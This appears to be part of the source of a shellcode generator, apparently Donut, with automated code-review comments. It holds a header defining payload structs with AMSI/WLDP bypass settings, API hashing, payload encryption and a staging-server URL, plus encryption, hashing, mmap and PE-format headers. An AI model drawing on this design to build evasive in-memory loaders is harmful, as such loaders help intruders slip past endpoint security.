218 uint32_t len; // total size of instance
219 DONUT_CRYPT key; // decrypts instance
220
221 uint64_t iv; // the 64-bit initial value for maru hash
222
223 union {
224 uint64_t hash[64]; // holds up to 64 api hashes
225 void *addr[64]; // holds up to 64 api addresses
226 // include prototypes only if header included from payload.h
227 #ifdef PAYLOAD_H
228 struct {
229 // imports from kernel32.dll or kernelbase.dll
230 LoadLibraryA_t LoadLibraryA;
231 GetProcAddress_t GetProcAddress;
232 GetModuleHandleA_t GetModuleHandleA;
233 VirtualAlloc_t VirtualAlloc; // required to allocate RW memory for instance
234 VirtualFree_t VirtualFree;
235 VirtualQuery_t VirtualQuery;
236 VirtualProtect_t VirtualProtect;
237 Sleep_t Sleep;
238 MultiByteToWideChar_t MultiByteToWideChar;
239 GetUserDefaultLCID_t GetUserDefaultLCID;
240
241 // imports from oleaut32.dll
242 SafeArrayCreate_t SafeArrayCreate;
243 SafeArrayCreateVector_t SafeArrayCreateVector;
244 SafeArrayPutElement_t SafeArrayPutElement;
245 SafeArrayDestroy_t SafeArrayDestroy;
246 SafeArrayGetLBound_t SafeArrayGetLBound;
247 SafeArrayGetUBound_t SafeArrayGetUBound;
248 SysAllocString_t SysAllocString;
249 SysFreeString_t SysFreeString;
250 LoadTypeLib_t LoadTypeLib;
251
252 // imports from wininet.dll
253 InternetCrackUrl_t InternetCrackUrl;
254 InternetOpen_t InternetOpen;
255 InternetConnect_t InternetConnect;
256 InternetSetOption_t InternetSetOption;
257 InternetReadFile_t InternetReadFile;
258 InternetCloseHandle_t InternetCloseHandle;
259 HttpOpenRequest_t HttpOpenRequest;
260 HttpSendRequest_t HttpSendRequest;
261 HttpQueryInfo_t HttpQueryInfo;
262
263 // imports from mscoree.dll
264 CorBindToRuntime_t CorBindToRuntime;
265 CLRCreateInstance_t CLRCreateInstance;
266
267 // imports from ole32.dll
268 CoInitializeEx_t CoInitializeEx;
269 CoCreateInstance_t CoCreateInstance;
270 CoUninitialize_t CoUninitialize;
271 };
272 #endif
273 } api;
274
275 // everything from here is encrypted
276 int api_cnt; // the 64-bit hashes of API required for instance to work
277 int dll_cnt; // the number of DLL to load before resolving API
278 char dll_name[DONUT_MAX_DLL][32]; // a list of DLL strings to load
279
280 union {
281 char s[8]; // amsi.dll
282 uint32_t w[2];
283 } amsi;
284
285 int bypass; // indicates behaviour of byassing AMSI/WLDP
286 char clr[8]; // clr.dll
287 char wldp[16]; // wldp.dll
288 char wldpQuery[32]; // WldpQueryDynamicCodeTrust
289 char wldpIsApproved[32]; // WldpIsClassInApprovedList
290 char amsiInit[16]; // AmsiInitialize
291 char amsiScanBuf[16]; // AmsiScanBuffer
292 char amsiScanStr[16]; // AmsiScanString
293
294 uint16_t wscript[8]; // WScript
295 uint16_t wscript_exe[16]; // wscript.exe
296
297 GUID xIID_IUnknown;
298 GUID xIID_IDispatch;
299
300 // GUID required to load .NET assemblies
301 GUID xCLSID_CLRMetaHost;
302 GUID xIID_ICLRMetaHost;
303 GUID xIID_ICLRRuntimeInfo;
304 GUID xCLSID_CorRuntimeHost;
305 GUID xIID_ICorRuntimeHost;
306 GUID xIID_AppDomain;
307
308 // GUID required to run VBS and JS files
309 GUID xCLSID_ScriptLanguage; // vbs or js
310 GUID xIID_IHost; // wscript object
311 GUID xIID_IActiveScript; // engine
312 GUID xIID_IActiveScriptSite; // implementation
313 GUID xIID_IActiveScriptParse32; // parser
314 GUID xIID_IActiveScriptParse64;
315
316 // GUID required to run XSL files
317 GUID xCLSID_DOMDocument30;
318 GUID xIID_IXMLDOMDocument;
319 GUID xIID_IXMLDOMNode;
320
321 int type; // DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL
322
323 struct {
324 char url[DONUT_MAX_URL]; // staging server hosting donut module
325 char req[8]; // just a buffer for "GET"
326 } http;
327
328 uint8_t sig[DONUT_MAX_NAME]; // string to hash
329 uint64_t mac; // to verify decryption ok
330
331 DONUT_CRYPT mod_key; // used to decrypt module
332 uint64_t mod_len; // total size of module
333
334 union {
335 PDONUT_MODULE p; // for URL
336 DONUT_MODULE x; // for PIC
337 } module;
338 } DONUT_INSTANCE, *PDONUT_INSTANCE;
339
340 typedef struct _DONUT_CONFIG {
341 int arch; // target architecture for shellcode
342 int bypass; // bypass option for AMSI/WDLP
343 char domain[DONUT_MAX_NAME]; // name of domain to create for assembly
344 char cls[DONUT_MAX_NAME]; // name of class and optional namespace
345 char method[DONUT_MAX_NAME]; // name of method to execute
346 char param[(DONUT_MAX_PARAM+1)*DONUT_MAX_NAME]; // string parameters passed to method, separated by comma or semi-colon
347 char file[DONUT_MAX_NAME]; // assembly to create module from
348 char url[DONUT_MAX_URL]; // points to root path of where module will be on remote http server
349 char runtime[DONUT_MAX_NAME]; // runtime version to use.
350 char modname[DONUT_MAX_NAME]; // name of module written to disk
351
352 int mod_type; // DONUT_MODULE_DLL or DONUT_MODULE_EXE
353 uint64_t mod_len; // size of DONUT_MODULE
354 PDONUT_MODULE mod; // points to donut module
355
356 int inst_type; // DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL
357 uint64_t inst_len; // size of DONUT_INSTANCE
358 PDONUT_INSTANCE inst; // points to donut instance
359
360 uint64_t pic_len; // size of shellcode
361 void* pic; // points to PIC/shellcode
362 } DONUT_CONFIG, *PDONUT_CONFIG;
363
364 #ifdef __cplusplus
365 extern "C" {
366 #endif
367
368 #ifdef DLL
369 #define EXPORT_FUNC __declspec(dllexport)
370 #else
371 #define EXPORT_FUNC
372 #endif
373
374 // public functions
375 EXPORT_FUNC int DonutCreate(PDONUT_CONFIG);
376 EXPORT_FUNC int DonutDelete(PDONUT_CONFIG);
377
378 #ifdef __cplusplus
379 }
380 #endif
381
382 #endif
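Review bot: `MDSTORAGESIGNATURE` ends with the zero-length array `BYTE pVersion[0];`, a GNU extension; the C99 flexible array member `BYTE pVersion[];` expresses the same trailing variable-length data portably (the same may apply to `BYTE data[4];` in `DONUT_MODULE` if it is indexed past four bytes, which this header alone cannot show). The public entry points `DonutCreate`/`DonutDelete` carry no contract: a `/** */` block on each stating that the return value is one of the `DONUT_ERROR_*` codes, which `DONUT_CONFIG` fields are inputs, and that `mod`, `inst`, `pic` and their lengths are filled in by `DonutCreate` and released by `DonutDelete` would let callers such as the Python extension use them correctly; that ownership split is inferred from the field comments and the extension's call sequence and should be confirmed against donut.c. On non-Windows builds the `strnicmp` macro maps to `strncasecmp`, which POSIX declares in `<strings.h>`; that header is not included here, so the mapping presumably relies on glibc exposing it through `<string.h>`.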
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef ENCRYPT_H
32 #define ENCRYPT_H
33
34 #include <stdint.h>
35 #include <stddef.h>
36
37 #ifndef ROTR32
38 #define ROTR32(v,n)(((v)>>(n))|((v)<<(32-(n))))
39 #endif
40
41 // CHASKEY block cipher
42 // 128-bit block with 128-bit key
43 #define ENCRYPT chaskey
44
45 #define CIPHER_BLK_LEN (128/8)
46 #define CIPHER_KEY_LEN (128/8)
47
48 #ifdef __cplusplus
49 extern "C" {
50 #endif
51
52 void donut_encrypt(void *mk, void *ctr, void *data, size_t len);
53
54 #define donut_decrypt(mk,ctr,data,len) donut_encrypt(mk,ctr,data,len)
55
56 #ifdef __cplusplus
57 }
58 #endif
59
60 #endif
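Review bot: The `donut_encrypt` prototype says nothing about its parameters, and the `void *mk` / `void *ctr` signature does not tell a caller how many bytes each must hold or that the counter is modified. A comment above the prototype such as `/* CTR-mode encrypt/decrypt of data[len] in place. mk: CIPHER_KEY_LEN bytes; ctr: CIPHER_BLK_LEN bytes (counter+nonce), advanced in place by the number of blocks consumed. Symmetric, hence donut_decrypt is an alias. */` would document the contract the implementation in encrypt.c establishes. `mk` is only read, so it could be declared `const void *mk` here and in the definition without affecting existing callers.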
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2017 Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef MARU_H
32 #define MARU_H
33
34 #include <stdint.h>
35 #include <string.h>
36
37 void *Memset (void *ptr, int value, size_t num);
38
39 #define MARU_MAX_STR 64
40 #define MARU_BLK_LEN 16
41 #define MARU_HASH_LEN 8
42 #define MARU_IV_LEN MARU_HASH_LEN
43 #define MARU_CRYPT speck
44
45 #ifndef ROTR32
46 #define ROTR32(v,n)(((v)>>(n))|((v)<<(32-(n))))
47 #endif
48
49 #ifdef __cplusplus
50 extern "C" {
51 #endif
52
53 uint64_t maru(const void *api, uint64_t iv);
54
55 #ifdef __cplusplus
56 }
57 #endif
58
59 #endif
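Review bot: `uint64_t maru(const void *api, uint64_t iv);` is declared without saying what `api` points to, how much of it is read, or what `iv` is, and the constants MARU_MAX_STR, MARU_BLK_LEN and MARU_HASH_LEN sit beside it with no stated relationship to the function. I would add above the prototype a comment along the lines of `// 64-bit hash of the data at api (presumably a NUL-terminated API name bounded by MARU_MAX_STR - confirm against the implementation); iv seeds the state so the same input hashes differently per iv.` The `void *Memset (void *ptr, int value, size_t num);` prototype also deserves a one-line comment on why a memset replacement is exported from a hash header; the `-nostdlib` build lines further down this commit suggest it exists for freestanding payload code, but the header should say so rather than leave it to the reader.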
0 /* mmap() replacement for Windows
1 *
2 * Author: Mike Frysinger <[email protected]>
3 * Placed into the public domain
4 */
5
6 /* References:
7 * CreateFileMapping: http://msdn.microsoft.com/en-us/library/aa366537(VS.85).aspx
8 * CloseHandle: http://msdn.microsoft.com/en-us/library/ms724211(VS.85).aspx
9 * MapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366761(VS.85).aspx
10 * UnmapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366882(VS.85).aspx
11 */
12
13 #include "mmap.h"
14
15 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset)
16 {
17 if (prot & ~(PROT_READ | PROT_WRITE | PROT_EXEC))
18 return MAP_FAILED;
19 if (fd == -1) {
20 if (!(flags & MAP_ANON) || offset)
21 return MAP_FAILED;
22 } else if (flags & MAP_ANON)
23 return MAP_FAILED;
24
25 DWORD flProtect;
26 if (prot & PROT_WRITE) {
27 if (prot & PROT_EXEC)
28 flProtect = PAGE_EXECUTE_READWRITE;
29 else
30 flProtect = PAGE_READWRITE;
31 } else if (prot & PROT_EXEC) {
32 if (prot & PROT_READ)
33 flProtect = PAGE_EXECUTE_READ;
34 else if (prot & PROT_EXEC)
35 flProtect = PAGE_EXECUTE;
36 } else
37 flProtect = PAGE_READONLY;
38
39 off_t end = length + offset;
40 HANDLE mmap_fd, h;
41 if (fd == -1)
42 mmap_fd = INVALID_HANDLE_VALUE;
43 else
44 mmap_fd = (HANDLE)_get_osfhandle(fd);
45 h = CreateFileMapping(mmap_fd, NULL, flProtect, DWORD_HI(end), DWORD_LO(end), NULL);
46 if (h == NULL)
47 return MAP_FAILED;
48
49 DWORD dwDesiredAccess;
50 if (prot & PROT_WRITE)
51 dwDesiredAccess = FILE_MAP_WRITE;
52 else
53 dwDesiredAccess = FILE_MAP_READ;
54 if (prot & PROT_EXEC)
55 dwDesiredAccess |= FILE_MAP_EXECUTE;
56 if (flags & MAP_PRIVATE)
57 dwDesiredAccess |= FILE_MAP_COPY;
58 void *ret = MapViewOfFile(h, dwDesiredAccess, DWORD_HI(offset), DWORD_LO(offset), length);
59 if (ret == NULL) {
60 CloseHandle(h);
61 ret = MAP_FAILED;
62 }
63 return ret;
64 }
65
66 void munmap(void *addr, size_t length)
67 {
68 UnmapViewOfFile(addr);
69 /* ruh-ro, we leaked handle from CreateFileMapping() ... */
70 }
71
72 #undef DWORD_HI
73 #undef DWORD_LO
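Review bot: The file-mapping handle `h` is closed only in the `if (ret == NULL)` failure branch, so every successful mmap() leaks one kernel handle, which the comment in munmap() already admits. A mapped view holds its own reference to the section object, so `CloseHandle(h);` can be called unconditionally right after the MapViewOfFile call, leaving the failure branch as just `ret = MAP_FAILED;` and removing the leak without any bookkeeping in munmap(). Separately, `off_t end = length + offset;` is formed with no overflow check before it is split into the CreateFileMapping size arguments; with a 32-bit off_t a large length plus offset wraps silently, so the call should be rejected when the sum cannot be represented in off_t. The inner `else if (prot & PROT_EXEC)` in the flProtect selection is always true at that point and reads more clearly as a plain `else`.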
0
1
2 #ifndef MMAP_H
3 #define MMAP_H
4
5 #include <io.h>
6 #include <windows.h>
7 #include <sys/types.h>
8
9 #define PROT_READ 0x1
10 #define PROT_WRITE 0x2
11 /* This flag is only available in WinXP+ */
12 #ifdef FILE_MAP_EXECUTE
13 #define PROT_EXEC 0x4
14 #else
15 #define PROT_EXEC 0x0
16 #define FILE_MAP_EXECUTE 0
17 #endif
18
19 #define MAP_SHARED 0x01
20 #define MAP_PRIVATE 0x02
21 #define MAP_ANONYMOUS 0x20
22 #define MAP_ANON MAP_ANONYMOUS
23 #define MAP_FAILED ((void *) -1)
24
25 #ifdef __USE_FILE_OFFSET64
26 # define DWORD_HI(x) (x >> 32)
27 # define DWORD_LO(x) ((x) & 0xffffffff)
28 #else
29 # define DWORD_HI(x) (0)
30 # define DWORD_LO(x) (x)
31 #endif
32
33 #ifdef __cplusplus
34 extern "C" {
35 #endif
36
37 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset);
38 void munmap(void *addr, size_t length);
39
40 #ifdef __cplusplus
41 }
42 #endif
43
44 #endif
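Review bot: `# define DWORD_HI(x) (x >> 32)` does not parenthesize its argument, unlike its sibling `DWORD_LO`; an expression argument such as `DWORD_HI(length + offset)` would shift only `offset`. Change it to `# define DWORD_HI(x) ((x) >> 32)`. Also `void munmap(void *addr, size_t length);` departs from the POSIX `int` return, so callers written against the real API cannot check its result; if this is meant as a drop-in replacement, returning `int` (0 on success, -1 when UnmapViewOfFile fails) keeps call sites portable.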
0
1 #ifndef PE_H
2 #define PE_H
3
4 #include "wintypes.h"
5
6 //
7 // Image Format
8 //
9
10
11 #ifndef _MAC
12
13 #include "pshpack4.h" // 4 byte packing is the default
14
15 #define IMAGE_DOS_SIGNATURE 0x5A4D // MZ
16 #define IMAGE_OS2_SIGNATURE 0x454E // NE
17 #define IMAGE_OS2_SIGNATURE_LE 0x454C // LE
18 #define IMAGE_VXD_SIGNATURE 0x454C // LE
19 #define IMAGE_NT_SIGNATURE 0x00004550 // PE00
20
21 #include "pshpack2.h" // 16 bit headers are 2 byte packed
22
23 #else
24
25 #include "pshpack1.h"
26
27 #define IMAGE_DOS_SIGNATURE 0x4D5A // MZ
28 #define IMAGE_OS2_SIGNATURE 0x4E45 // NE
29 #define IMAGE_OS2_SIGNATURE_LE 0x4C45 // LE
30 #define IMAGE_NT_SIGNATURE 0x50450000 // PE00
31 #endif
32
33 typedef struct _IMAGE_DOS_HEADER { // DOS .EXE header
34 WORD e_magic; // Magic number
35 WORD e_cblp; // Bytes on last page of file
36 WORD e_cp; // Pages in file
37 WORD e_crlc; // Relocations
38 WORD e_cparhdr; // Size of header in paragraphs
39 WORD e_minalloc; // Minimum extra paragraphs needed
40 WORD e_maxalloc; // Maximum extra paragraphs needed
41 WORD e_ss; // Initial (relative) SS value
42 WORD e_sp; // Initial SP value
43 WORD e_csum; // Checksum
44 WORD e_ip; // Initial IP value
45 WORD e_cs; // Initial (relative) CS value
46 WORD e_lfarlc; // File address of relocation table
47 WORD e_ovno; // Overlay number
48 WORD e_res[4]; // Reserved words
49 WORD e_oemid; // OEM identifier (for e_oeminfo)
50 WORD e_oeminfo; // OEM information; e_oemid specific
51 WORD e_res2[10]; // Reserved words
52 LONG e_lfanew; // File address of new exe header
53 } IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;
54
55 #ifndef _MAC
56 #include "poppack.h" // Back to 4 byte packing
57 #endif
58
59 //
60 // File header format.
61 //
62
63 typedef struct _IMAGE_FILE_HEADER {
64 WORD Machine;
65 WORD NumberOfSections;
66 DWORD TimeDateStamp;
67 DWORD PointerToSymbolTable;
68 DWORD NumberOfSymbols;
69 WORD SizeOfOptionalHeader;
70 WORD Characteristics;
71 } IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER;
72
73 #define IMAGE_SIZEOF_FILE_HEADER 20
74
75 #define IMAGE_FILE_RELOCS_STRIPPED 0x0001 // Relocation info stripped from file.
76 #define IMAGE_FILE_EXECUTABLE_IMAGE 0x0002 // File is executable (i.e. no unresolved externel references).
77 #define IMAGE_FILE_LINE_NUMS_STRIPPED 0x0004 // Line nunbers stripped from file.
78 #define IMAGE_FILE_LOCAL_SYMS_STRIPPED 0x0008 // Local symbols stripped from file.
79 #define IMAGE_FILE_AGGRESIVE_WS_TRIM 0x0010 // Agressively trim working set
80 #define IMAGE_FILE_LARGE_ADDRESS_AWARE 0x0020 // App can handle >2gb addresses
81 #define IMAGE_FILE_BYTES_REVERSED_LO 0x0080 // Bytes of machine word are reversed.
82 #define IMAGE_FILE_32BIT_MACHINE 0x0100 // 32 bit word machine.
83 #define IMAGE_FILE_DEBUG_STRIPPED 0x0200 // Debugging info stripped from file in .DBG file
84 #define IMAGE_FILE_REMOVABLE_RUN_FROM_SWAP 0x0400 // If Image is on removable media, copy and run from the swap file.
85 #define IMAGE_FILE_NET_RUN_FROM_SWAP 0x0800 // If Image is on Net, copy and run from the swap file.
86 #define IMAGE_FILE_SYSTEM 0x1000 // System File.
87 #define IMAGE_FILE_DLL 0x2000 // File is a DLL.
88 #define IMAGE_FILE_UP_SYSTEM_ONLY 0x4000 // File should only be run on a UP machine
89 #define IMAGE_FILE_BYTES_REVERSED_HI 0x8000 // Bytes of machine word are reversed.
90
91 #define IMAGE_FILE_MACHINE_UNKNOWN 0
92 #define IMAGE_FILE_MACHINE_I386 0x014c // Intel 386.
93 #define IMAGE_FILE_MACHINE_R3000 0x0162 // MIPS little-endian, 0x160 big-endian
94 #define IMAGE_FILE_MACHINE_R4000 0x0166 // MIPS little-endian
95 #define IMAGE_FILE_MACHINE_R10000 0x0168 // MIPS little-endian
96 #define IMAGE_FILE_MACHINE_WCEMIPSV2 0x0169 // MIPS little-endian WCE v2
97 #define IMAGE_FILE_MACHINE_ALPHA 0x0184 // Alpha_AXP
98 #define IMAGE_FILE_MACHINE_SH3 0x01a2 // SH3 little-endian
99 #define IMAGE_FILE_MACHINE_SH3DSP 0x01a3
100 #define IMAGE_FILE_MACHINE_SH3E 0x01a4 // SH3E little-endian
101 #define IMAGE_FILE_MACHINE_SH4 0x01a6 // SH4 little-endian
102 #define IMAGE_FILE_MACHINE_SH5 0x01a8 // SH5
103 #define IMAGE_FILE_MACHINE_ARM 0x01c0 // ARM Little-Endian
104 #define IMAGE_FILE_MACHINE_THUMB 0x01c2
105 #define IMAGE_FILE_MACHINE_AM33 0x01d3
106 #define IMAGE_FILE_MACHINE_POWERPC 0x01F0 // IBM PowerPC Little-Endian
107 #define IMAGE_FILE_MACHINE_POWERPCFP 0x01f1
108 #define IMAGE_FILE_MACHINE_IA64 0x0200 // Intel 64
109 #define IMAGE_FILE_MACHINE_MIPS16 0x0266 // MIPS
110 #define IMAGE_FILE_MACHINE_ALPHA64 0x0284 // ALPHA64
111 #define IMAGE_FILE_MACHINE_MIPSFPU 0x0366 // MIPS
112 #define IMAGE_FILE_MACHINE_MIPSFPU16 0x0466 // MIPS
113 #define IMAGE_FILE_MACHINE_AXP64 IMAGE_FILE_MACHINE_ALPHA64
114 #define IMAGE_FILE_MACHINE_TRICORE 0x0520 // Infineon
115 #define IMAGE_FILE_MACHINE_CEF 0x0CEF
116 #define IMAGE_FILE_MACHINE_EBC 0x0EBC // EFI Byte Code
117 #define IMAGE_FILE_MACHINE_AMD64 0x8664 // AMD64 (K8)
118 #define IMAGE_FILE_MACHINE_M32R 0x9041 // M32R little-endian
119 #define IMAGE_FILE_MACHINE_CEE 0xC0EE
120
121 //
122 // Directory format.
123 //
124
125 typedef struct _IMAGE_DATA_DIRECTORY {
126 DWORD VirtualAddress;
127 DWORD Size;
128 } IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY;
129
130 #define IMAGE_NUMBEROF_DIRECTORY_ENTRIES 16
131
132 //
133 // Optional header format.
134 //
135
136 typedef struct _IMAGE_OPTIONAL_HEADER {
137 //
138 // Standard fields.
139 //
140
141 WORD Magic;
142 BYTE MajorLinkerVersion;
143 BYTE MinorLinkerVersion;
144 DWORD SizeOfCode;
145 DWORD SizeOfInitializedData;
146 DWORD SizeOfUninitializedData;
147 DWORD AddressOfEntryPoint;
148 DWORD BaseOfCode;
149 DWORD BaseOfData;
150
151 //
152 // NT additional fields.
153 //
154
155 DWORD ImageBase;
156 DWORD SectionAlignment;
157 DWORD FileAlignment;
158 WORD MajorOperatingSystemVersion;
159 WORD MinorOperatingSystemVersion;
160 WORD MajorImageVersion;
161 WORD MinorImageVersion;
162 WORD MajorSubsystemVersion;
163 WORD MinorSubsystemVersion;
164 DWORD Win32VersionValue;
165 DWORD SizeOfImage;
166 DWORD SizeOfHeaders;
167 DWORD CheckSum;
168 WORD Subsystem;
169 WORD DllCharacteristics;
170 DWORD SizeOfStackReserve;
171 DWORD SizeOfStackCommit;
172 DWORD SizeOfHeapReserve;
173 DWORD SizeOfHeapCommit;
174 DWORD LoaderFlags;
175 DWORD NumberOfRvaAndSizes;
176 IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
177 } IMAGE_OPTIONAL_HEADER32, *PIMAGE_OPTIONAL_HEADER32;
178
179 typedef struct _IMAGE_OPTIONAL_HEADER64 {
180 WORD Magic;
181 BYTE MajorLinkerVersion;
182 BYTE MinorLinkerVersion;
183 DWORD SizeOfCode;
184 DWORD SizeOfInitializedData;
185 DWORD SizeOfUninitializedData;
186 DWORD AddressOfEntryPoint;
187 DWORD BaseOfCode;
188 ULONGLONG ImageBase;
189 DWORD SectionAlignment;
190 DWORD FileAlignment;
191 WORD MajorOperatingSystemVersion;
192 WORD MinorOperatingSystemVersion;
193 WORD MajorImageVersion;
194 WORD MinorImageVersion;
195 WORD MajorSubsystemVersion;
196 WORD MinorSubsystemVersion;
197 DWORD Win32VersionValue;
198 DWORD SizeOfImage;
199 DWORD SizeOfHeaders;
200 DWORD CheckSum;
201 WORD Subsystem;
202 WORD DllCharacteristics;
203 ULONGLONG SizeOfStackReserve;
204 ULONGLONG SizeOfStackCommit;
205 ULONGLONG SizeOfHeapReserve;
206 ULONGLONG SizeOfHeapCommit;
207 DWORD LoaderFlags;
208 DWORD NumberOfRvaAndSizes;
209 IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
210 } IMAGE_OPTIONAL_HEADER64, *PIMAGE_OPTIONAL_HEADER64;
211
212 #define IMAGE_NT_OPTIONAL_HDR32_MAGIC 0x10b
213 #define IMAGE_NT_OPTIONAL_HDR64_MAGIC 0x20b
214 #define IMAGE_ROM_OPTIONAL_HDR_MAGIC 0x107
215
216 #ifdef _WIN64
217 typedef IMAGE_OPTIONAL_HEADER64 IMAGE_OPTIONAL_HEADER;
218 typedef PIMAGE_OPTIONAL_HEADER64 PIMAGE_OPTIONAL_HEADER;
219 #define IMAGE_NT_OPTIONAL_HDR_MAGIC IMAGE_NT_OPTIONAL_HDR64_MAGIC
220 #else
221 typedef IMAGE_OPTIONAL_HEADER32 IMAGE_OPTIONAL_HEADER;
222 typedef PIMAGE_OPTIONAL_HEADER32 PIMAGE_OPTIONAL_HEADER;
223 #define IMAGE_NT_OPTIONAL_HDR_MAGIC IMAGE_NT_OPTIONAL_HDR32_MAGIC
224 #endif
225
226 typedef struct _IMAGE_NT_HEADERS64 {
227 DWORD Signature;
228 IMAGE_FILE_HEADER FileHeader;
229 IMAGE_OPTIONAL_HEADER64 OptionalHeader;
230 } IMAGE_NT_HEADERS64, *PIMAGE_NT_HEADERS64;
231
232 typedef struct _IMAGE_NT_HEADERS {
233 DWORD Signature;
234 IMAGE_FILE_HEADER FileHeader;
235 IMAGE_OPTIONAL_HEADER32 OptionalHeader;
236 } IMAGE_NT_HEADERS32, *PIMAGE_NT_HEADERS32;
237
238 #if defined(_WIN32)
239 typedef IMAGE_NT_HEADERS32 IMAGE_NT_HEADERS;
240 typedef PIMAGE_NT_HEADERS32 PIMAGE_NT_HEADERS;
241 #else
242 typedef IMAGE_NT_HEADERS64 IMAGE_NT_HEADERS;
243 typedef PIMAGE_NT_HEADERS64 PIMAGE_NT_HEADERS;
244 #endif
245
246 // IMAGE_FIRST_SECTION doesn't need 32/64 versions since the file header is the same either way.
247
248 #define IMAGE_FIRST_SECTION( ntheader ) ((PIMAGE_SECTION_HEADER) \
249 ((ULONG_PTR)(ntheader) + \
250 offsetof( IMAGE_NT_HEADERS, OptionalHeader ) + \
251 ((ntheader))->FileHeader.SizeOfOptionalHeader \
252 ))
253
254 // Subsystem Values
255
256 #define IMAGE_SUBSYSTEM_UNKNOWN 0 // Unknown subsystem.
257 #define IMAGE_SUBSYSTEM_NATIVE 1 // Image doesn't require a subsystem.
258 #define IMAGE_SUBSYSTEM_WINDOWS_GUI 2 // Image runs in the Windows GUI subsystem.
259 #define IMAGE_SUBSYSTEM_WINDOWS_CUI 3 // Image runs in the Windows character subsystem.
260 #define IMAGE_SUBSYSTEM_OS2_CUI 5 // image runs in the OS/2 character subsystem.
261 #define IMAGE_SUBSYSTEM_POSIX_CUI 7 // image runs in the Posix character subsystem.
262 #define IMAGE_SUBSYSTEM_NATIVE_WINDOWS 8 // image is a native Win9x driver.
263 #define IMAGE_SUBSYSTEM_WINDOWS_CE_GUI 9 // Image runs in the Windows CE subsystem.
264 #define IMAGE_SUBSYSTEM_EFI_APPLICATION 10 //
265 #define IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER 11 //
266 #define IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER 12 //
267 #define IMAGE_SUBSYSTEM_EFI_ROM 13
268 #define IMAGE_SUBSYSTEM_XBOX 14
269 #define IMAGE_SUBSYSTEM_WINDOWS_BOOT_APPLICATION 16
270
271 // DllCharacteristics Entries
272
273 // IMAGE_LIBRARY_PROCESS_INIT 0x0001 // Reserved.
274 // IMAGE_LIBRARY_PROCESS_TERM 0x0002 // Reserved.
275 // IMAGE_LIBRARY_THREAD_INIT 0x0004 // Reserved.
276 // IMAGE_LIBRARY_THREAD_TERM 0x0008 // Reserved.
277 #define IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE 0x0040 // DLL can move.
278 #define IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY 0x0080 // Code Integrity Image
279 #define IMAGE_DLLCHARACTERISTICS_NX_COMPAT 0x0100 // Image is NX compatible
280 #define IMAGE_DLLCHARACTERISTICS_NO_ISOLATION 0x0200 // Image understands isolation and doesn't want it
